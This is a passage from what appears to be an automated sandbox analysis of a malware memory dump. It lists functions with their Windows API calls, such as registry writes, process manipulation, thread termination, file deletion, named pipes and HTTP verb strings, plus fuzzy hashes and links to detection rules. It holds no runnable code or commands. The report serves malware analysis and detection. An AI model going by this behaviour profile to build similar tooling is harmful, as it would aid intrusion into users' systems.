Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,037580C4,?), ref: 0374079D
RegOpenKeyA.ADVAPI32(80000001,037580C4,?), ref: 037407A7
lstrlen.KERNEL32(037580C4,00000000,00000000,0375706E,?,?,?,03739C58,00000001,00000000,?), ref: 037407C6

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 4eb6b0ba125a297745fa5926ab6b6ace6db764212a852d76f2204e330aee13bc
Instruction ID: a000877189365f2b8d98cebea0febcdf5ad96f8e76e96527d6054a0f13afe9df
Opcode Fuzzy Hash: 4eb6b0ba125a297745fa5926ab6b6ace6db764212a852d76f2204e330aee13bc
Instruction Fuzzy Hash: 81F06276100208FFDB16AF90DC88E9ABB6CEB45794F108049FE4685140D7B0A680CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03739C25, Relevance: 3.1, APIs: 2, Instructions: 81registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03740788: RegCreateKeyA.ADVAPI32(80000001,037580C4,?), ref: 0374079D
Part of subcall function 03740788: lstrlen.KERNEL32(037580C4,00000000,00000000,0375706E,?,?,?,03739C58,00000001,00000000,?), ref: 037407C6

RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,03757068,00000000,00000001,00000000,?,0375706E,00000000,?,?,?,?,00000000), ref: 03739C79
RegCloseKey.ADVAPI32(?), ref: 03739CC6

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID:
API String ID: 971780412-0
Opcode ID: 0a3c6b8411fb17e1a6dbfd864f2815a864c933afdffb955ff011f0c2856ddad9
Instruction ID: ebecff19cfea5d5d8fb4dac5adb717aadbf0dc067236aeb5d272d52454762d2c
Opcode Fuzzy Hash: 0a3c6b8411fb17e1a6dbfd864f2815a864c933afdffb955ff011f0c2856ddad9
Instruction Fuzzy Hash: 35316476D0139CEFDB69EFA4D844A9EBBF8EB06750F108156E908A7245D3B48A40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 03733BA6, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 03733BE1

Part of subcall function 037407E8: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,03758380), ref: 037407FF

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 3f9e3af7f84772c5ebf89f468d70d0de817e3a0be8cbaaae33d86d9f47ee49ad
Instruction ID: 81a62a4c6c5416a4ac91965eca08bff5e9da1fb27404a59e4007d0602487b3ee
Opcode Fuzzy Hash: 3f9e3af7f84772c5ebf89f468d70d0de817e3a0be8cbaaae33d86d9f47ee49ad
Instruction Fuzzy Hash: 9B21A53A700204AFFB35CF5AC884D69B7EAEF467A0718442DE985CB191D770E940DB10

Uniqueness

Uniqueness Score: -1.00%

Function 037399C1, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,03750FDC,00000000), ref: 037399CD

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: db32282eb19f237ef967f63df34f29dd4835c44043a80c0ae183fc6cb863a782
Instruction ID: 24e6ebfef6f65c7d826c0062f1043e06db57ae9df963e10f8e3bbefa426e6663
Opcode Fuzzy Hash: db32282eb19f237ef967f63df34f29dd4835c44043a80c0ae183fc6cb863a782
Instruction Fuzzy Hash: AAB01237400300EBCA09AB00ED04F057B21A750700F11C410B208810E882B904A2EB04

Uniqueness

Uniqueness Score: -1.00%

Function 0373E2D8, Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 037447CF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0374481B
Part of subcall function 037447CF: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,0373643A,00000000,?,?), ref: 0374485F

HeapFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,03737F85,?), ref: 0373E368

Part of subcall function 0374ABB7: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,03732C39,00000000,00000001,-00000007,?,00000000), ref: 0374ABD9

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateCloseFreememcpy
String ID:
API String ID: 2041072108-0
Opcode ID: 32acb00233fe1f848dd3050fea441cf3b10d7b84c104825badd2b6eab2eaf060
Instruction ID: 938478695f8ff928d70bf46a7e068619edc5d72a0a5f523bccc478961dcdbe7a
Opcode Fuzzy Hash: 32acb00233fe1f848dd3050fea441cf3b10d7b84c104825badd2b6eab2eaf060
Instruction Fuzzy Hash: 5611A3B7600305FBDB18EB59D880EAD7BA9EB4D310F145069E506AB782D7B4AD409B11

Uniqueness

Uniqueness Score: -1.00%

Function 0373638F, Relevance: 1.3, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 03736406

Part of subcall function 037399C1: RtlFreeHeap.NTDLL(00000000,00000000,03750FDC,00000000), ref: 037399CD

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateErrorFreeLast
String ID:
API String ID: 3102831662-0
Opcode ID: 2fd41badc061bc5f09959ea90315a5c8e58bb12aa605c189d410570d06dcfcbe
Instruction ID: d191c31eb40ae1c7364b9514d53eadca92325403174606da50ae707c40c8b84d
Opcode Fuzzy Hash: 2fd41badc061bc5f09959ea90315a5c8e58bb12aa605c189d410570d06dcfcbe
Instruction Fuzzy Hash: D011A5B6900208BBDB11DFA9C9C4BDEFBB9EF86351F244069E41497241EB74CA01CB60

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0373E9AC, Relevance: 19.7, APIs: 13, Instructions: 234filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

memset.NTDLL ref: 0373EA4C
FindFirstFileW.KERNEL32(00000000,00000000), ref: 0373EA67
memset.NTDLL ref: 0373EACA
wcscpy.NTDLL ref: 0373EADC
RtlEnterCriticalSection.NTDLL(?), ref: 0373EB38

Part of subcall function 037399C1: RtlFreeHeap.NTDLL(00000000,00000000,03750FDC,00000000), ref: 037399CD

RtlLeaveCriticalSection.NTDLL(?), ref: 0373EB54
FindNextFileW.KERNEL32(?,00000000), ref: 0373EB6D
WaitForSingleObject.KERNEL32(00000000), ref: 0373EB7F
FindClose.KERNEL32(?), ref: 0373EB94
FindFirstFileW.KERNEL32(00000000,00000000), ref: 0373EBA8
FindNextFileW.KERNEL32(?,00000000), ref: 0373EC40
WaitForSingleObject.KERNEL32(00000000), ref: 0373EC52
FindClose.KERNEL32(?), ref: 0373EC6D

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Find$File$CloseCriticalFirstHeapNextObjectSectionSingleWaitmemset$AllocateEnterFreeLeavewcscpy
String ID:
API String ID: 2408353863-0
Opcode ID: b8a453f189d1a6a5fcde05d6440b12314d8911e8521ec65e0ed68ceb6249d832
Instruction ID: 3832e2073c6e8d717eb28e5dc82d4f042f73d3ff1138716d200dff43dbf16548
Opcode Fuzzy Hash: b8a453f189d1a6a5fcde05d6440b12314d8911e8521ec65e0ed68ceb6249d832
Instruction Fuzzy Hash: 78815A72504309AFC715EF65DC88E1BBBE9FF89300F084829F99697252D7B5D8448F52

Uniqueness

Uniqueness Score: -1.00%

Function 0373B347, Relevance: 13.6, APIs: 9, Instructions: 130nativethreadCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,03758108,00000000,?,?,03732A85,?,00000000,?), ref: 0373B37A
GetLastError.KERNEL32(?,?,03732A85,?,00000000,?), ref: 0373B388
NtSetInformationProcess.NTDLL ref: 0373B3E2
TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 0373B499
CloseHandle.KERNEL32(?), ref: 0373B4AF
CloseHandle.KERNEL32(?), ref: 0373B4D5

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CloseHandleProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 1476822243-0
Opcode ID: 268eab1cca8fe013bdfc16eac0888e18d274634d1c98dca926e123a5249c2a6e
Instruction ID: b9f4514e6dd6a832de82f92ff03548af032ea45acaf24baa86858e9cc3425bed
Opcode Fuzzy Hash: 268eab1cca8fe013bdfc16eac0888e18d274634d1c98dca926e123a5249c2a6e
Instruction Fuzzy Hash: 6341B171104349EFD711EF21D888A1BBBF8FF89708F048A2DF59992251D7B4CA48CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0374A2FE, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000001,03757CC8,?,037327DF), ref: 0374A316

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

FindFirstFileW.KERNEL32(00000001,00000000,?,037327DF), ref: 0374A37F
lstrlenW.KERNEL32(0000002C,?,037327DF), ref: 0374A3A7
RemoveDirectoryW.KERNEL32(?,?,037327DF), ref: 0374A3F9
DeleteFileW.KERNEL32(?,?,037327DF), ref: 0374A404
FindNextFileW.KERNEL32(037327DF,00000000,?,037327DF), ref: 0374A417

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 8e8beb9031c7c15077da1da3a6257749509b8056ad0ae959003e72902574b4cb
Instruction ID: cb57e2055395e174f9b414447d0176c3933967894af077ac8cb9e01c1bdca8b3
Opcode Fuzzy Hash: 8e8beb9031c7c15077da1da3a6257749509b8056ad0ae959003e72902574b4cb
Instruction Fuzzy Hash: 2A415E71940309EFDF51EFA9EC48AAEBBB8EF01340F1484A5E911AA151D7B49A84EF50

Uniqueness

Uniqueness Score: -1.00%

Function 037323D6, Relevance: 56.4, APIs: 31, Strings: 1, Instructions: 438memorysynchronizationstringCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 037323FD
memcpy.NTDLL(?,?,00000010), ref: 03732420
memset.NTDLL ref: 0373246C
lstrcpyn.KERNEL32(?,?,00000034), ref: 03732480
GetLastError.KERNEL32 ref: 037324AB
GetLastError.KERNEL32 ref: 037324F2
GetLastError.KERNEL32 ref: 03732511
WaitForSingleObject.KERNEL32(?,000927C0), ref: 0373254B
WaitForSingleObject.KERNEL32(?,00000000), ref: 03732559
GetLastError.KERNEL32 ref: 037325D3
ReleaseMutex.KERNEL32(?), ref: 037325E5
RtlExitUserThread.NTDLL(?), ref: 037325FB
GetLastError.KERNEL32 ref: 0373261E
RtlAllocateHeap.NTDLL(00000000,?), ref: 0373263A
GetLastError.KERNEL32 ref: 03732689
HeapFree.KERNEL32(00000000,00000000), ref: 0373269F
RtlAllocateHeap.NTDLL(00000000,?), ref: 037326B3
GetLastError.KERNEL32 ref: 037326CD
GetLastError.KERNEL32 ref: 03732700
HeapFree.KERNEL32(00000000,00000000), ref: 0373271E
lstrlenW.KERNEL32(00000000,?), ref: 0373274A
RtlAllocateHeap.NTDLL(00000000,?), ref: 0373275F
DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 03732833
HeapFree.KERNEL32(00000000,?), ref: 03732842
WaitForSingleObject.KERNEL32(00000000), ref: 03732857
HeapFree.KERNEL32(00000000,00000000), ref: 0373286A
HeapFree.KERNEL32(00000000,?), ref: 0373287C
RtlExitUserThread.NTDLL(?,?), ref: 03732891
lstrlen.KERNEL32(00000010,00000010,00000000,00000000), ref: 037328A2
lstrcpy.KERNEL32(00000000,03754404), ref: 037328C5
HeapFree.KERNEL32(00000000,00000000,00000000,?,00007530), ref: 037328F3

Strings

, xrefs: 03732743

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$ErrorLast$Free$ObjectSingleWait$Allocate$ExitThreadUserlstrlen$DeleteFileMutexReleaselstrcpylstrcpynmemcpymemset
String ID:
API String ID: 462291804-3916222277
Opcode ID: 63c53bd5ab8eea3c2fc2de350cc5bf0c5535174cff5ea4582491d97cfab794d8
Instruction ID: eeac41632f5bd825f33a8a8423974da2005e17081ce69db881084e84f0c135c7
Opcode Fuzzy Hash: 63c53bd5ab8eea3c2fc2de350cc5bf0c5535174cff5ea4582491d97cfab794d8
Instruction Fuzzy Hash: D5F1BA72900309EFCB14EFA5DC88EAABBF8FF89310F148869F51593252D7B89945DB11

Uniqueness

Uniqueness Score: -1.00%

Function 03740ECF, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,037580F0), ref: 03740F31
RtlAllocateHeap.NTDLL(00000000,0375807D,?), ref: 03740FCD
lstrcpyn.KERNEL32(00000000,?,0375807D,?,037580F0), ref: 03740FE2
HeapFree.KERNEL32(00000000,00000000,00000000,?,037580F0), ref: 03740FFD
StrChrA.SHLWAPI(?,00000020,00000000,?,0375807C,?,?,037580F0), ref: 037410E4
StrChrA.SHLWAPI(00000001,00000020,?,037580F0), ref: 037410F5
lstrlen.KERNEL32(00000000,?,037580F0), ref: 03741109
memmove.NTDLL(0375807D,?,00000001,?,037580F0), ref: 03741119
lstrlen.KERNEL32(?,00000000,?,0375807C,?,?,037580F0), ref: 03741145
RtlAllocateHeap.NTDLL(00000000,?), ref: 0374116B
memcpy.NTDLL(00000000,?,?,?,037580F0), ref: 0374117F
memcpy.NTDLL(0375807C,?,?,?,037580F0), ref: 0374119F
HeapFree.KERNEL32(00000000,0375807C,?,?,?,?,?,?,?,?,037580F0), ref: 037411DB
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 037412A1
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 037412E9

Strings

OPTI, xrefs: 03740F09
PUT , xrefs: 03740EFB
GET , xrefs: 03740EF4
GET , xrefs: 037410D1
OPTI, xrefs: 037410D9
POST, xrefs: 03740F02

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: GET $GET $OPTI$OPTI$POST$PUT
API String ID: 3227826163-647159250
Opcode ID: eda6748f0fffed032ace36272a73f24b95a3590c7aaabae67d6721215d103d3c
Instruction ID: e67027a61b54033ef6872e7fec7476745ce8ebfc7f317a5b4ffe7c8a0f9c76e5
Opcode Fuzzy Hash: eda6748f0fffed032ace36272a73f24b95a3590c7aaabae67d6721215d103d3c
Instruction Fuzzy Hash: CAE17D35A00309EFCB19EFA9CC88AAEBBB9FF04300F148598E915DB254D774E991DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0374A7E4, Relevance: 25.8, APIs: 17, Instructions: 262memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0374A805
GetTickCount.KERNEL32 ref: 0374A81F
QueryPerformanceFrequency.KERNEL32(?), ref: 0374A87E
QueryPerformanceCounter.KERNEL32(?), ref: 0374A889
_aulldiv.NTDLL(?,?,?,?), ref: 0374A89F
HeapFree.KERNEL32(00000000,?), ref: 0374A8ED
HeapFree.KERNEL32(00000000,?), ref: 0374A924
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0374A9D4
GetTickCount.KERNEL32 ref: 0374A9E4
RtlEnterCriticalSection.NTDLL(037582EC), ref: 0374A9F8
RtlLeaveCriticalSection.NTDLL(037582EC), ref: 0374AA16
StrTrimA.SHLWAPI(00000000,037543E8,00000000,0375832C), ref: 0374AA4F
HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000001,?,00000001), ref: 0374AB01
HeapFree.KERNEL32(00000000,?,00000000), ref: 0374AB13
HeapFree.KERNEL32(00000000,00000000,00000000,0375832C), ref: 0374AB22
HeapFree.KERNEL32(00000000,00000000), ref: 0374AB34
HeapFree.KERNEL32(00000000,?), ref: 0374AB46

Part of subcall function 03735018: WaitForSingleObject.KERNEL32(00000000,037582C0,00000000,00000000,00000000,?,00000008,?,00000000,00000000,?,?,?,037449EC,?,?), ref: 037350D8

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$Free$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveObjectSingleTrimWait_aulldiv
String ID:
API String ID: 4181253886-0
Opcode ID: 48b6fc308e7115c13a833814ba2135b5e3bec88296ab0fa5f9024e0c6104d8c4
Instruction ID: b3d9a1805ed8a57d55baff491b9303213daa10ea2fcc06eae6398b4b59143960
Opcode Fuzzy Hash: 48b6fc308e7115c13a833814ba2135b5e3bec88296ab0fa5f9024e0c6104d8c4
Instruction Fuzzy Hash: C0A16932600349EFCB49EF68EC84E6A7BE9FB48204F148429F508D7264D7B9D856DF52

Uniqueness

Uniqueness Score: -1.00%

Function 037354B4, Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 037354D6
RtlEnterCriticalSection.NTDLL(03757FE8), ref: 037354F3
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 03735543
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0373554D
GetLastError.KERNEL32 ref: 03735557
HeapFree.KERNEL32(00000000,00000000), ref: 03735568
HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0373558A
HeapFree.KERNEL32(00000000,?), ref: 037355C1
RtlLeaveCriticalSection.NTDLL(03757FE8), ref: 037355D5
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 037355DE
SuspendThread.KERNEL32(00000000), ref: 037355ED
CreateEventA.KERNEL32(03758168,00000001,00000000), ref: 03735601
SetEvent.KERNEL32(00000000), ref: 0373560E
CloseHandle.KERNEL32(00000000), ref: 03735615
Sleep.KERNEL32(000001F4), ref: 03735628
ResumeThread.KERNEL32(00000000), ref: 0373564C

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID:
API String ID: 1011176505-0
Opcode ID: 161b7faecfd8b7d044257acae6aa4f475eeb4c82d7837f41417f01b5774be567
Instruction ID: cabc76e970a1eded38c7d084ef651aaca28463a8faffb2316a5fdc3e0eb2f0e4
Opcode Fuzzy Hash: 161b7faecfd8b7d044257acae6aa4f475eeb4c82d7837f41417f01b5774be567
Instruction Fuzzy Hash: F3414D73900349FFCB04FFA1EC889ADBBBAFF06310B1580A9E50593115D7B99A919F51

Uniqueness

Uniqueness Score: -1.00%

Function 03737C9D, Relevance: 22.7, APIs: 15, Instructions: 237memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00001000), ref: 03737CBB
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 03737CDE
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 03737CF6
GetFileAttributesA.KERNEL32(00000008), ref: 03737D6F
GetLastError.KERNEL32 ref: 03737DAA
CloseHandle.KERNEL32(?), ref: 03737F36
GetLastError.KERNEL32 ref: 03737F3E
HeapFree.KERNEL32(00000000,?), ref: 03737F51

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorFileHeapLast$AllocateAttributesCloseCreateFreeHandle
String ID:
API String ID: 2504064324-0
Opcode ID: 7adc36c994bf2678e3352cf1bcce5ce747ad6dac3d621b34bbb67991a838608c
Instruction ID: 5e4e2795af9872d028daff98f562db3b3f671f02112f358cdf296c3ffc178af2
Opcode Fuzzy Hash: 7adc36c994bf2678e3352cf1bcce5ce747ad6dac3d621b34bbb67991a838608c
Instruction Fuzzy Hash: 979145B2900249EFDF09EFA4DC84DAE7BB9FF09300B008065F915A6261E7B59A55CF60

Uniqueness

Uniqueness Score: -1.00%

Function 037337B3, Relevance: 19.8, APIs: 13, Instructions: 281memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0373E9AC: memset.NTDLL ref: 0373EA4C
Part of subcall function 0373E9AC: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0373EA67
Part of subcall function 0373E9AC: memset.NTDLL ref: 0373EACA
Part of subcall function 0373E9AC: wcscpy.NTDLL ref: 0373EADC

Part of subcall function 0373E9AC: RtlEnterCriticalSection.NTDLL(?), ref: 0373EB38
Part of subcall function 0373E9AC: RtlLeaveCriticalSection.NTDLL(?), ref: 0373EB54
Part of subcall function 0373E9AC: FindNextFileW.KERNEL32(?,00000000), ref: 0373EB6D
Part of subcall function 0373E9AC: WaitForSingleObject.KERNEL32(00000000), ref: 0373EB7F
Part of subcall function 0373E9AC: FindClose.KERNEL32(?), ref: 0373EB94
Part of subcall function 0373E9AC: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0373EBA8

RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 03733829
memcpy.NTDLL(00000000,?,?), ref: 03733842
lstrcpyW.KERNEL32(?,?), ref: 0373385C

Part of subcall function 0373E9AC: FindNextFileW.KERNEL32(?,00000000), ref: 0373EC40
Part of subcall function 0373E9AC: WaitForSingleObject.KERNEL32(00000000), ref: 0373EC52
Part of subcall function 0373E9AC: FindClose.KERNEL32(?), ref: 0373EC6D

HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 03733887
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 03733899
HeapFree.KERNEL32(00000000,00000000), ref: 037338F7
RtlAllocateHeap.NTDLL(00000000,?), ref: 0373392A
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000014), ref: 037339AA
HeapFree.KERNEL32(00000000,?), ref: 037339BA

Part of subcall function 0374FC3B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0374F307,?,00000000,-00000007,03732C21,-00000007,?,00000000), ref: 0374FC4A

CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 037339E3
DeleteFileW.KERNEL32(?,?), ref: 03733AD8
HeapFree.KERNEL32(00000000,?), ref: 03733AE6
HeapFree.KERNEL32(00000000,?), ref: 03733B07

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$FindFree$File$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeavelstrcpylstrlenmemcpywcscpy
String ID:
API String ID: 2316329205-0
Opcode ID: 1a72eafc16f7a0990df8d3bb0530ac177417787c42b6941a0c68e4bf902578b4
Instruction ID: 4ed1134b0ead9e3aafbea5acf912252f77975d7a95c91dd127e21c36fa66d1be
Opcode Fuzzy Hash: 1a72eafc16f7a0990df8d3bb0530ac177417787c42b6941a0c68e4bf902578b4
Instruction Fuzzy Hash: 6AB14C72900209FFDB18EF95DC88CAA7BFCEB46344B148059F518DB215D7B8AA46DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0373D17B, Relevance: 18.1, APIs: 12, Instructions: 149synchronizationlibrarypipeCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0373D1AD
WaitForSingleObject.KERNEL32(03758128,00000000), ref: 0373D1CF
ConnectNamedPipe.KERNEL32(?,?), ref: 0373D1EF
GetLastError.KERNEL32 ref: 0373D1F9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0373D21D
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 0373D260
WaitForSingleObject.KERNEL32(00000000), ref: 0373D272
CloseHandle.KERNEL32(?), ref: 0373D287
GetLastError.KERNEL32 ref: 0373D294
CloseHandle.KERNEL32(?), ref: 0373D2A1
RtlExitUserThread.NTDLL(000000FF), ref: 0373D2B7
LoadLibraryExW.KERNEL32(?,?,000000FF,?,00000000), ref: 0373D2F9

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Wait$CloseErrorHandleLastObjectSingle$BuffersConnectCreateEventExitFileFlushLibraryLoadMultipleNamedObjectsPipeThreadUser
String ID:
API String ID: 2672822787-0
Opcode ID: 695ec46805301c8d6a6ed1e92029cc305e161f47eb2a8d50dbb40e7f3b2fb5ab
Instruction ID: bb2858e2fe9769872cc8f58cb21a6127205e7bad0ebc6fc1254ad952ede0d1c7
Opcode Fuzzy Hash: 695ec46805301c8d6a6ed1e92029cc305e161f47eb2a8d50dbb40e7f3b2fb5ab
Instruction Fuzzy Hash: 7D510471508309EFDB14EF65DC4495ABBB9FF49320F104A29F924C20A0DBB4C941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03749675, Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0374968C
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,03731B5B,?,?,00000000,00000094,00000000), ref: 0374969E
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,03731B5B,?,?,00000000,00000094,00000000), ref: 037496AB
wsprintfA.USER32 ref: 037496C6
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000094,00000000), ref: 037496DC
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 037496F5
WriteFile.KERNEL32(00000000,00000000), ref: 037496FD
GetLastError.KERNEL32 ref: 0374970B
CloseHandle.KERNEL32(00000000), ref: 03749714
GetLastError.KERNEL32(?,00000000,?,03731B5B,?,?,00000000,00000094,00000000), ref: 03749725
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,03731B5B,?,?,00000000,00000094,00000000), ref: 03749735

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID:
API String ID: 3873609385-0
Opcode ID: 5f6d2c90b1f4b7a5ee54be86ff7677e8c4d5e3e84128343949e21b65fc224139
Instruction ID: d9495f4c9ceb8f6f29682d4438236d1abfaf199d2b4c4eb994ce155e7e0ef3a5
Opcode Fuzzy Hash: 5f6d2c90b1f4b7a5ee54be86ff7677e8c4d5e3e84128343949e21b65fc224139
Instruction Fuzzy Hash: C911E773100318BFD2297F21AC8CFBB3B5CEB46265F148168FA0AD2184DBA81C85C771

Uniqueness

Uniqueness Score: -1.00%

Function 0374564C, Relevance: 15.1, APIs: 10, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 03745670

Part of subcall function 0373C9C5: RegCloseKey.ADVAPI32(?), ref: 0373CA4C

lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0374569F
lstrlenW.KERNEL32(?,?,?,00000000), ref: 037456B0
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 037456EA
RegCloseKey.ADVAPI32(?), ref: 03745715
RtlEnterCriticalSection.NTDLL(03757FE8), ref: 0374572B
HeapFree.KERNEL32(00000000,00000000), ref: 03745740
RtlLeaveCriticalSection.NTDLL(03757FE8), ref: 03745754
HeapFree.KERNEL32(00000000,?), ref: 03745769
RegCloseKey.ADVAPI32(?), ref: 03745772

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID:
API String ID: 4138089493-0
Opcode ID: d1d88d77ed195526ad9386a579b7f2c2e824c541841e95369dbab055b953ec38
Instruction ID: 3de181f8bee9170cd2a401e45a851fe5bf50b2377ff279afd6b086771eb1b46c
Opcode Fuzzy Hash: d1d88d77ed195526ad9386a579b7f2c2e824c541841e95369dbab055b953ec38
Instruction Fuzzy Hash: 0A316E36A00208FFCB16EFA4EC88D9E7BB9FB49311B1481A9F519D2114D3B99A41DF10

Uniqueness

Uniqueness Score: -1.00%

Function 03746DB5, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON

Download Yara Rule

APIs

